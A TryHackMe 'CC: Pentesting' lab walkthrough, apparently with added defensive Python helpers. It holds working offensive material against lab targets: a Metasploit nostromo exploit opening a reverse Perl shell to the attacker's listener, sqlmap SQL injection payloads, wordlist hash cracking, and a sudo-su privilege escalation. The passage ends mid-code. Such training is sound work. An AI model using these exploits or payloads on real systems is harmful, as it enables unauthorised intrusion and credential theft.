
Writeup for TryHackMe room - CC Pentesting

CC: Pentesting

For the complete TryHackMe path, refer to the link.

Task 2 - Network Utilities - nmap

References

Answers to all four questions at the end of the task can be obtained from a single nmap command.

nmap -sV -sC <ip>

The output will be similar to

Nmap scan report for <ip>
Host is up (0.18s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    <service> httpd <version> ((Ubuntu))
|_http-title: <title>

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.06 seconds
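To turn scan output like the one above into something that can be checked or diffed, here is a small parser for nmap's normal output. It is an added example, not code from the page or from the room; the sample scan text embedded below is constructed in the page's format (the service and version strings are made up and are not the room's answers). It handles both the `-sV -sC` form (version column and NSE script lines) and the plain `-F` form used later in the Final Exam, where no version column is present.

```python
import re
from typing import List

# Regex for one result line of nmap's normal output. The VERSION column is
# optional, so the same parser handles a plain `nmap -F` scan (no -sV) and a
# `-sV -sC` scan whose port lines carry a version string.
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+"
    r"(?P<state>open\|filtered|closed\|filtered|open|closed|filtered)\s+"
    r"(?P<service>\S+)(?:\s+(?P<version>\S.*))?$"
)


def parse_nmap(text: str) -> List[dict]:
    """Return one dict per port line: port (int), proto, state, service,
    version (or None) and the NSE script lines that followed it."""
    results: List[dict] = []
    for raw in text.splitlines():
        line = raw.rstrip()
        m = PORT_LINE.match(line)
        if m:
            entry = m.groupdict()
            entry["port"] = int(entry["port"])
            entry["scripts"] = []
            results.append(entry)
        elif line.startswith("|") and results:
            # "|_http-title: ..." lines belong to the port just parsed
            results[-1]["scripts"].append(line.lstrip("|_ ").rstrip())
    return results


def open_ports(results: List[dict]) -> List[int]:
    return [r["port"] for r in results if r["state"] == "open"]


# Constructed sample output in the format shown on the page; the service and
# version strings are invented and are not the room's answers.
SAMPLE_SV = """\
Nmap scan report for 10.0.0.5
Host is up (0.18s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    ExampleHTTPd 1.2.3 ((Ubuntu))
|_http-title: Example Site

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
"""

SAMPLE_FAST = """\
PORT     STATE    SERVICE
22/tcp   open     ssh
80/tcp   open     http
5101/tcp filtered admdog
"""

if __name__ == "__main__":
    for entry in parse_nmap(SAMPLE_SV) + parse_nmap(SAMPLE_FAST):
        print(entry)
```

The four answers for this task (service name, version, and so on) are exactly the fields the parser pulls out of the port line and its attached script output; for real use, feed it the text of `nmap -oN` output instead of the constructed sample.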

Task 4 - Web enumeration - gobuster

References

It is better to use the rockyou.txt wordlist than dirb's common.txt wordlist. To set up the rockyou.txt wordlist, check the link. For quicker results, use dirb's common.txt wordlist.

Deploy the machine and scan the URL.

gobuster dir -u http://<ip> -w /usr/share/dirb/wordlists/common.txt --no-error

Output similar to the following will be obtained, revealing a hidden directory.

===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://<ip>
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirb/wordlists/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2020/12/24 01:43:22 Starting gobuster in directory enumeration mode
===============================================================
/.htaccess            (Status: 403) [Size: 278]
/.hta                 (Status: 403) [Size: 278]
/.htpasswd            (Status: 403) [Size: 278]
/index.html           (Status: 200) [Size: 11321]
/<flag>               (Status: 301) [Size: 315] [--> http://10.10.224.132/<flag>/]
/server-status        (Status: 403) [Size: 278]

===============================================================
2020/12/24 01:45:02 Finished
===============================================================

Scan the URL again with the extension option to find the hidden file.

gobuster dir -u http://<ip> -w /usr/share/dirb/wordlists/common.txt -x xxa --random-agent --no-error

Output similar to the following will be obtained, revealing a hidden file with the xxa extension.

===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://<ip>
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirb/wordlists/common.txt
[+] Negative Status codes:   404
[+] User Agent:              Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_8; ja-jp) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27
[+] Extensions:              xxa
[+] Timeout:                 10s
===============================================================
2020/12/24 01:48:43 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 278]
/.hta.xxa             (Status: 403) [Size: 278]
/.htaccess            (Status: 403) [Size: 278]
/.htpasswd            (Status: 403) [Size: 278]
/.htaccess.xxa        (Status: 403) [Size: 278]
/.htpasswd.xxa        (Status: 403) [Size: 278]
/index.html           (Status: 200) [Size: 11321]
/<flag>.xxa           (Status: 200) [Size: 12]
/<previous-flag>      (Status: 301) [Size: 315] [--> http://10.10.224.132/<previous-flag>/]
/server-status        (Status: 403) [Size: 278]

===============================================================
2020/12/24 01:52:24 Finished
===============================================================
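Both gobuster runs above return several 403 entries (/.hta, /.htaccess, /.htpasswd, /server-status) that all have the same body size, 278 bytes: that is the server's generic forbidden page, not a discovery. The following added example (not code from the page or from gobuster) parses gobuster's result lines and separates such noise from real findings by treating 403 hits that share the dominant 403 body size as boilerplate. The sample output is constructed in the page's format with invented paths.

```python
import re
from collections import Counter
from typing import List, Tuple

# One result line of gobuster "dir" mode output, as printed on the page, e.g.
# "/secret  (Status: 301) [Size: 311] [--> http://10.0.0.5/secret/]"
GB_LINE = re.compile(
    r"^(?P<path>/\S*)\s+\(Status:\s*(?P<status>\d{3})\)\s*\[Size:\s*(?P<size>\d+)\]"
    r"(?:\s*\[-->\s*(?P<redirect>[^\]]+)\])?"
)


def parse_gobuster(text: str) -> List[dict]:
    hits = []
    for raw in text.splitlines():
        m = GB_LINE.match(raw.strip())
        if m:
            hit = m.groupdict()
            hit["status"] = int(hit["status"])
            hit["size"] = int(hit["size"])
            hits.append(hit)
    return hits


def triage(hits: List[dict], noise_statuses=(403,)) -> Tuple[List[dict], List[dict]]:
    """Split hits into (findings, noise).

    The server answers every forbidden path with the same generic error page
    (every 403 above is 278 bytes), so 403 hits that share the most common
    403 size are noise. Everything else, a 200, a 301, or a 403 with an
    unusual size, is worth a closer look."""
    sizes = Counter(h["size"] for h in hits if h["status"] in noise_statuses)
    baseline = sizes.most_common(1)[0][0] if sizes else None
    findings, noise = [], []
    for h in hits:
        if h["status"] in noise_statuses and h["size"] == baseline:
            noise.append(h)
        else:
            findings.append(h)
    return findings, noise


# Constructed sample in gobuster's output format; paths and sizes are invented.
SAMPLE_GOBUSTER = """\
/.htaccess            (Status: 403) [Size: 278]
/.hta                 (Status: 403) [Size: 278]
/.htpasswd            (Status: 403) [Size: 278]
/index.html           (Status: 200) [Size: 11321]
/hidden               (Status: 301) [Size: 315] [--> http://10.0.0.5/hidden/]
/hidden.xxa           (Status: 200) [Size: 12]
/server-status        (Status: 403) [Size: 278]
"""

if __name__ == "__main__":
    found, skipped = triage(parse_gobuster(SAMPLE_GOBUSTER))
    for h in found:
        print(f"{h['status']} {h['path']} size={h['size']} redirect={h['redirect']}")
    print(f"{len(skipped)} generic 403 responses ignored")
```

The size-based baseline is a heuristic: a 403 whose body differs in size from the others may be a real, access-controlled resource and is deliberately kept in the findings list.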

Task 10 - Metasploit - Final Walkthrough

References

Use Metasploit to find the flag. Deploy the machine and start Metasploit. Select the exploit module exploit/multi/http/nostromo_code_exec; its configured payload is cmd/unix/reverse_perl.

msf6 > use exploit/multi/http/nostromo_code_exec
[*] Using configured payload cmd/unix/reverse_perl

Set the remote host address and port, and the local host address. The local host address is the connected IP address shown on the THM page; it can also be found in the output of the ip a command.

msf6 exploit(multi/http/nostromo_code_exec) > set RHOST <target-ip>
RHOST => <target-ip>
msf6 exploit(multi/http/nostromo_code_exec) > set RPORT 80
RPORT => 80
msf6 exploit(multi/http/nostromo_code_exec) > set LHOST <vpn-ip>
LHOST => <vpn-ip>

Check that the options are set correctly for the exploit.

msf6 exploit(multi/http/nostromo_code_exec) > show options

Module options (exploit/multi/http/nostromo_code_exec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   <target-ip>      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    80               yes       The target port (TCP)
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)
   VHOST                     no        HTTP server virtual host


Payload options (cmd/unix/reverse_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  <vpn-ip>         yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic (Unix In-Memory)

Run the exploit and use the resulting shell to find the flags.

msf6 exploit(multi/http/nostromo_code_exec) > exploit

[*] Started reverse TCP handler on <vpn-ip>:4444
[*] Configuring Automatic (Unix In-Memory) target
[*] Sending cmd/unix/reverse_perl command payload
[*] Command shell session 1 opened (<vpn-ip>:4444 -> <target-ip>:49596) at 2020-12-24 20:11:05 +0530

shell
[*] Trying to find binary(python) on target machine
[*] Found python at /usr/bin/python
[*] Using `python` to pop up an interactive shell
[*] Trying to find binary(bash) on target machine
[*] Found bash at /bin/bash

pwd
/bin

_nostromo@ubuntu:/bin$ cd /var/nostromo/htdocs
cd /var/nostromo/htdocs

_nostromo@ubuntu:/var/nostromo/htdocs$ ls
ls
index.html  nostromo.gif  <flag-1>

_nostromo@ubuntu:/var/nostromo/htdocs$ ls <flag-1>
ls <flag-1>
nice

_nostromo@ubuntu:/var/nostromo/htdocs$ cat <flag-1>/nice
cat <flag-1>/nice
<flag-2>

Abort session 1? [y/N]  y

[*] <target-ip> - Command shell session 1 closed.  Reason: User exit

Task 13 - Hash Cracking - hashcat

References

The two tasks mentioned can be done either with the hashcat command or with online resources, like this or this. If you get a segmentation fault while using hashcat, either use the link to set up the proper drivers, use the THM AttackBox, or use online hash cracking to get the flag.

Use the following command to crack the MD5 hash.

hashcat -m0 -a0 -O --force "56ab24c15b72a457069c5ea42fcfc640" /usr/share/wordlists/rockyou.txt

The output will be similar to the following, with the cracked password shown after the hash,

Host memory required for this attack: 0 MB

Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 4 secs

56ab24c15b72a457069c5ea42fcfc640:<flag>

Session..........: hashcat
Status...........: Cracked
Hash.Name........: MD5
Hash.Target......: 56ab24c15b72a457069c5ea42fcfc640
Time.Started.....: Sat Dec 24 03:34:49 2020, (0 secs)
Time.Estimated...: Sat Dec 24 03:34:49 2020, (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   439.6 kH/s (0.90ms) @ Accel:1024 Loops:1 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests
Progress.........: 2048/14344385 (0.01%)
Rejected.........: 0/2048 (0.00%)
Restore.Point....: 0/14344385 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: 123456 -> lovers1

Use the following command to crack the MD4 hash.

hashcat -m900 -a0 -O --force "4bc9ae2b9236c2ad02d81491dcb51d5f" /usr/share/wordlists/rockyou.txt

The output will be similar to the following, with the cracked password shown after the hash,

Host memory required for this attack: 0 MB

Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 3 secs

4bc9ae2b9236c2ad02d81491dcb51d5f:<flag>

Session..........: hashcat
Status...........: Cracked
Hash.Name........: MD4
Hash.Target......: 4bc9ae2b9236c2ad02d81491dcb51d5f
Time.Started.....: Sat Dec 24 03:40:39 2020, (2 secs)
Time.Estimated...: Sat Dec 24 03:40:41 2020, (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   733.1 kH/s (0.73ms) @ Accel:1024 Loops:1 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests
Progress.........: 839704/14344385 (5.85%)
Rejected.........: 24/839704 (0.00%)
Restore.Point....: 837656/14344385 (5.84%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: notnotnot -> ninja202

Task 14 - Hash Cracking - John the Ripper

References

Check the formats available for use with the john command using john --list=formats. Sometimes john will show No password hashes left to crack (see FAQ) for some hashes, because it skips hashes already recorded in its default pot file; pointing it at a separate pot file with --pot resolves this issue.

To crack the MD5 hash, copy it to a file: echo "5d41402abc4b2a76b9719d911017c592" > /data/hash.txt. Then use the following command to crack the password.

john --format=Raw-MD5 --wordlist=/usr/share/wordlists/rockyou.txt --pot=/data/john.pot /data/hash.txt

Output similar to the following will be obtained.

Using default input encoding: UTF-8
Loaded 1 password hash (Raw-MD5 [MD5 128/128 SSE4.1 4x3])
Warning: no OpenMP support for this hash type, consider --fork=2
Press 'q' or Ctrl-C to abort, almost any other key for status
<flag>            (?)
1g 0:00:00:00 DONE (2020-12-24 04:21) 50.00g/s 9600p/s 9600c/s 9600C/s 123456..november
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed.

To crack the SHA1 hash, copy it to a file: echo "5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8" > /data/hash.txt. Then use the following command to crack the password.

john --format=Raw-SHA1 --wordlist=/usr/share/wordlists/rockyou.txt --pot=/data/john.pot /data/hash.txt

Output similar to the following will be obtained.

Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA1 [SHA1 128/128 SSE4.1 4x])
Warning: no OpenMP support for this hash type, consider --fork=2
Press 'q' or Ctrl-C to abort, almost any other key for status
<flag>         (?)
1g 0:00:00:00 DONE (2020-12-24 04:25) 100.0g/s 400.0p/s 400.0c/s 400.0C/s 123456..password
Use the "--show --format=Raw-SHA1" options to display all of the cracked passwords reliably
Session completed.
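Tasks 13 and 14 both crack unsalted, fast hashes (MD5, MD4, SHA1) with a wordlist, and the SHA-1 found in the Final Exam below is cracked the same way. The following added example, which is not code from the page, from hashcat or from john, shows in plain Python what those tools do (hash each candidate, compare) and, beside it, why the mitigation is salting plus a slow KDF rather than a different fast hash: the same wordlist still finds a weak password, but every guess now costs thousands of HMAC calls and must be repeated per account, so precomputed lookups no longer work. The wordlist is a constructed stand-in for rockyou.txt, and the hashlib algorithm names tried per digest length are an assumption modelled on hashid's suggestions.

```python
import hashlib
import hmac
import os
from typing import Iterable, List, Optional, Tuple

# Constructed stand-in for rockyou.txt; the real list is read from disk,
# one candidate per line.
WORDLIST = ["123456", "password", "qwerty", "letmein", "hello", "dragon"]

# Digest length in hex characters -> hashlib names to try (assumed order,
# modelled on the hashid suggestions shown later on this page).
DIGEST_LENGTHS = {32: ["md5", "md4"], 40: ["sha1", "ripemd160"],
                  64: ["sha256"], 128: ["sha512"]}


def guess_algorithms(hex_digest: str) -> List[str]:
    return DIGEST_LENGTHS.get(len(hex_digest), [])


def dictionary_lookup(target_hex: str, algo: str, words: Iterable[str]) -> Optional[str]:
    """Hash every candidate and compare: the unsalted dictionary attack that
    `hashcat -a0` and `john --wordlist` perform. One fast hash per guess, and
    a hit is reusable against every account that chose the same password."""
    target = target_hex.lower()
    for word in words:
        if hashlib.new(algo, word.encode()).hexdigest() == target:
            return word
    return None


def crack_unsalted(target_hex: str, words: Iterable[str]) -> Optional[Tuple[str, str]]:
    """Try each plausible algorithm for the digest length; returns (algo, word)."""
    words = list(words)
    for algo in guess_algorithms(target_hex):
        try:
            found = dictionary_lookup(target_hex, algo, words)
        except ValueError:  # algorithm not provided by this OpenSSL build (e.g. md4)
            continue
        if found is not None:
            return algo, found
    return None


def store_password(password: str, iterations: int = 100_000) -> str:
    """Mitigation: per-user random salt and a slow KDF (PBKDF2-HMAC-SHA256).
    Format: pbkdf2_sha256$<iterations>$<salt hex>$<derived key hex>."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(password: str, stored: str) -> bool:
    _, iters, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)  # constant-time comparison


def dictionary_lookup_salted(stored: str, words: Iterable[str]) -> Tuple[Optional[str], int]:
    """Same wordlist against a salted, iterated hash. Returns (word or None,
    number of KDF evaluations spent); each evaluation costs `iterations` HMACs
    and nothing computed here transfers to another user's hash."""
    tried = 0
    for word in words:
        tried += 1
        if verify_password(word, stored):
            return word, tried
    return None, tried


if __name__ == "__main__":
    demo = hashlib.md5(b"dragon").hexdigest()  # constructed target, not a room hash
    print("unsalted:", crack_unsalted(demo, WORDLIST))
    stored = store_password("dragon", iterations=100_000)
    print("salted:  ", dictionary_lookup_salted(stored, WORDLIST))
```

Running it shows the same weak password recovered in both cases; the difference is that the salted run spends 100,000 HMAC evaluations per candidate per account, which is what makes a rockyou-sized list expensive at scale, while the unsalted MD5/SHA-1 lookups on this page complete in seconds at hundreds of kH/s.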

Task 18 - SQL Injection - Vulnerable Web Application

References

Deploy the machine and check the web response using curl <ip>.

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Add Record Form</title>
</head>
<body>
<form action="/" method="post">
   <p>msg: </p> <input type="text" name="msg" id="msgg">
</form>
</body>
</html>

There is a POST parameter named msg, which could be exploited. To get the flag from the MySQL backend of the vulnerable web app, use the command,

sqlmap -u "http://<ip>" --data "msg=test" -p msg --dump --batch -v 0

The following response will be obtained.

[*] starting @ 04:44:00 /2020-12-24/

it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
POST parameter 'msg' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 366 HTTP(s) requests:
---
Parameter: msg (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: msg=test' RLIKE (SELECT (CASE WHEN (6965=6965) THEN 0x74657374 ELSE 0x28 END))-- eMep

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: msg=test' AND (SELECT 1792 FROM(SELECT COUNT(*),CONCAT(0x71626b7671,(SELECT (ELT(1792=1792,1))),0x71786b7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- zCjW

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: msg=test' AND SLEEP(5)-- IIix
---
web server operating system: Linux Ubuntu
web application technology: PHP 7.0.33
back-end DBMS: MySQL >= 5.0
Database: <flag1>
Table: msg
[2 entries]
+------+
| msg  |
+------+
| msg  |
| test |
+------+

Database: <flag1>
Table: lol
[1 entry]
+----------+
| flag     |
+----------+
| <flag3>  |
+----------+

[*] ending @ 04:45:21 /2020-12-24/
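sqlmap reported the msg parameter as injectable by three techniques; the root cause behind all of them is the same, user input concatenated into a SQL string. The following added example (not the room's PHP application and not code from the page) reproduces the defect against an in-memory SQLite copy of the msg table sqlmap dumped above, shows the parameterised form that fixes it, and includes the boolean-based differential check sqlmap used: if a true and a false condition appended to the same input give different results, the input is being parsed as SQL. The table contents and probes are constructed for this example.

```python
import sqlite3
from typing import Callable, List

# In-memory stand-in for the room's MySQL database: the same `msg` table with
# the two rows sqlmap dumped above. Constructed for this example.
def setup_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE msg (msg TEXT)")
    conn.executemany("INSERT INTO msg (msg) VALUES (?)", [("msg",), ("test",)])
    conn.commit()
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, msg: str) -> List[str]:
    # The defect sqlmap detected: the form value is spliced straight into SQL,
    # so a quote in the input terminates the literal and the rest is executed.
    query = f"SELECT msg FROM msg WHERE msg = '{msg}'"
    return [row[0] for row in conn.execute(query)]


def lookup_safe(conn: sqlite3.Connection, msg: str) -> List[str]:
    # Parameterised query: the value is bound as data and never parsed as SQL,
    # whatever characters it contains.
    return [row[0] for row in conn.execute("SELECT msg FROM msg WHERE msg = ?", (msg,))]


# A tautology of the kind sqlmap's boolean-based test builds on; constructed.
PROBE = "test' OR '1'='1"


def differential_probe(lookup: Callable[[sqlite3.Connection, str], List[str]],
                       conn: sqlite3.Connection, base: str = "test") -> bool:
    """Boolean-based blind check as sqlmap performs it: a true and a false
    condition appended to the same input must give identical results if the
    input is handled as data. A difference means it is being interpreted."""
    truthy = lookup(conn, f"{base}' AND '1'='1")
    falsy = lookup(conn, f"{base}' AND '1'='2")
    return truthy != falsy


if __name__ == "__main__":
    db = setup_db()
    print("vulnerable, normal input:", lookup_vulnerable(db, "test"))
    print("vulnerable, probe:       ", lookup_vulnerable(db, PROBE))
    print("safe, probe:             ", lookup_safe(db, PROBE))
    print("injectable? vulnerable =", differential_probe(lookup_vulnerable, db),
          " safe =", differential_probe(lookup_safe, db))
```

The differential check is also a useful regression test to keep in a code base: it fails loudly if someone later replaces a bound parameter with string formatting.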

Task 24 - Final Exam

Deploy the machine and do a quick basic enumeration,

nmap -Pn -n -T4 -F <ip>

The list of open ports can be seen.

Starting Nmap 7.70 ( https://nmap.org ) at 2020-12-24 04:52 IST
Nmap scan report for <ip>
Host is up (0.16s latency).
Not shown: 97 closed ports
PORT     STATE    SERVICE
22/tcp   open     ssh
80/tcp   open     http
5101/tcp filtered admdog

Nmap done: 1 IP address (1 host up) scanned in 2.19 seconds

Check if we get a response on port 80.

curl -I -L -s <ip>

The response would be similar to

HTTP/1.1 200 OK
Date: Fri, 23 Dec 2020 23:26:53 GMT
Server: Apache/2.4.18 (Ubuntu)
Last-Modified: Sat, 21 Dec 2019 02:19:15 GMT
ETag: "2c39-59a2d6bc5ae41"
Accept-Ranges: bytes
Content-Length: 11321
Vary: Accept-Encoding
Content-Type: text/html

Check if gobuster can detect any directories and files. We can use dirb's common.txt wordlist for quick enumeration.

gobuster dir -u "http://<ip>" -w /usr/share/dirb/wordlists/common.txt --random-agent --no-error

Similar output will be obtained.

===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://<ip>
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirb/wordlists/common.txt
[+] Negative Status codes:   404
[+] User Agent:              Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.6 Safari/530.5
[+] Timeout:                 10s
===============================================================
2020/12/24 05:02:11 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 276]
/.htaccess            (Status: 403) [Size: 276]
/.htpasswd            (Status: 403) [Size: 276]
/index.html           (Status: 200) [Size: 11321]
/secret               (Status: 301) [Size: 311] [--> http://10.10.95.65/secret/]
/server-status        (Status: 403) [Size: 276]

===============================================================
2020/12/24 05:03:26 Finished
===============================================================

Check if we can find any text files in the /secret directory.

gobuster dir -u "http://<ip>/secret" -x txt -w /usr/share/dirb/wordlists/common.txt --random-agent --no-error

Output similar to the following will be obtained.

===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://<ip>/secret
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirb/wordlists/common.txt
[+] Negative Status codes:   404
[+] User Agent:              Mozilla/5.0 (Windows NT 6.1; rv:2.0b11pre) Gecko/20110126 Firefox/4.0b11pre
[+] Extensions:              txt
[+] Timeout:                 10s
===============================================================
2020/12/24 05:04:39 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 276]
/.hta.txt             (Status: 403) [Size: 276]
/.htaccess            (Status: 403) [Size: 276]
/.htpasswd            (Status: 403) [Size: 276]
/.htaccess.txt        (Status: 403) [Size: 276]
/.htpasswd.txt        (Status: 403) [Size: 276]
/index.html           (Status: 200) [Size: 0]
/secret.txt           (Status: 200) [Size: 46]

===============================================================
2020/12/24 05:07:09 Finished
===============================================================

Check if we can read the contents of the /secret/secret.txt file.

curl http://<ip>/secret/secret.txt

We get a username and a hashed password, nyan:046385855FC9580393853D8E81F240B66FE9A7B8.

Identify what kind of hash we got, using,

hashid -m 046385855FC9580393853D8E81F240B66FE9A7B8

We get suggestions for what the hash type could be.

Analyzing '046385855FC9580393853D8E81F240B66FE9A7B8'
[+] SHA-1 [Hashcat Mode: 100]
[+] Double SHA-1 [Hashcat Mode: 4500]
[+] RIPEMD-160 [Hashcat Mode: 6000]
[+] Haval-160
[+] Tiger-160
[+] HAS-160
[+] LinkedIn [Hashcat Mode: 190]
[+] Skein-256(160)
[+] Skein-512(160)

This can be cracked using either hashcat or john.

hashcat -m100 -a0 -O --force "046385855FC9580393853D8E81F240B66FE9A7B8" /usr/share/wordlists/rockyou.txt

The cracked password can be seen in the output,

Host memory required for this attack: 0 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

046385855fc9580393853d8e81f240b66fe9a7b8:<password>

Session..........: hashcat
Status...........: Cracked
Hash.Name........: SHA1
Hash.Target......: 046385855fc9580393853d8e81f240b66fe9a7b8
Time.Started.....: Sat Dec 24 05:14:29 2020, (7 secs)
Time.Estimated...: Sat Dec 24 05:14:36 2020, (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   666.1 kH/s (1.10ms) @ Accel:1024 Loops:1 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests
Progress.........: 4971567/14344385 (34.66%)
Rejected.........: 1071/4971567 (0.02%)
Restore.Point....: 4969519/14344385 (34.64%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: nydia26 -> ny11590

Started: Sat Dec 24 05:14:26 2020
Stopped: Sat Dec 24 05:14:38 2020

Try to SSH into the machine with ssh nyan@<ip>, using the cracked password.

nyan@<ip>'s password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-142-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
Last login: Sat Dec 21 08:37:54 2019
nyan@ubuntu:~$ ls
user.txt

The contents of user.txt are the first flag.

Check if nyan is allowed to run any sudo commands.

nyan@ubuntu:~$ sudo -l
Matching Defaults entries for nyan on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nyan may run the following commands on ubuntu:
    (root) NOPASSWD: /bin/su

Switch to the root user to get the second flag from the root.txt file.

nyan@ubuntu:~$ sudo su -
root@ubuntu:~# ls
root.txt
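The privilege escalation above works because the sudoers rule `(root) NOPASSWD: /bin/su` is equivalent to a passwordless root login. The following added example (not code from the page or from sudo) is a small audit helper that parses `sudo -l` output of the form shown above and flags rules granting a shell-capable command as root, so the misconfiguration can be caught during a host review rather than during an engagement. The sample output is constructed in the page's format, and the set of shell-capable binaries is an assumed starting list rather than an exhaustive one.

```python
import re
from typing import List

# Commands that hand the caller an interactive shell (or arbitrary command
# execution) as the run-as user. Assumed starting list, not exhaustive.
SHELL_CAPABLE = {"ALL", "/bin/su", "/bin/sh", "/bin/bash", "/bin/dash",
                 "/usr/bin/env", "/usr/bin/sudo"}

# Matches rule lines such as "(root) NOPASSWD: /bin/su" or "(ALL : ALL) ALL".
RULE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")


def parse_sudo_l(text: str) -> List[dict]:
    """One dict per command granted: runas, nopasswd flag, command string."""
    rules = []
    in_rules = False
    for line in text.splitlines():
        if line.startswith("User ") and "may run the following commands" in line:
            in_rules = True  # everything before this line is the Defaults block
            continue
        if not in_rules:
            continue
        m = RULE.match(line)
        if not m:
            continue
        tags = {t.strip() for t in m.group("tags").split(":") if t.strip()}
        for cmd in m.group("cmds").split(","):
            rules.append({"runas": m.group("runas").strip(),
                          "nopasswd": "NOPASSWD" in tags,
                          "command": cmd.strip()})
    return rules


def risky_rules(rules: List[dict]) -> List[dict]:
    """Rules that let the user obtain a root shell. A password-protected
    variant is still reported: the user's own password is enough to use it."""
    out = []
    for r in rules:
        binary = r["command"].split()[0]
        as_root = r["runas"].split(":")[0].strip() in ("root", "ALL")
        if as_root and binary in SHELL_CAPABLE:
            out.append(r)
    return out


# Constructed `sudo -l` output in the format shown on the page.
SAMPLE_SUDO_L = r"""
Matching Defaults entries for nyan on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nyan may run the following commands on ubuntu:
    (root) NOPASSWD: /bin/su
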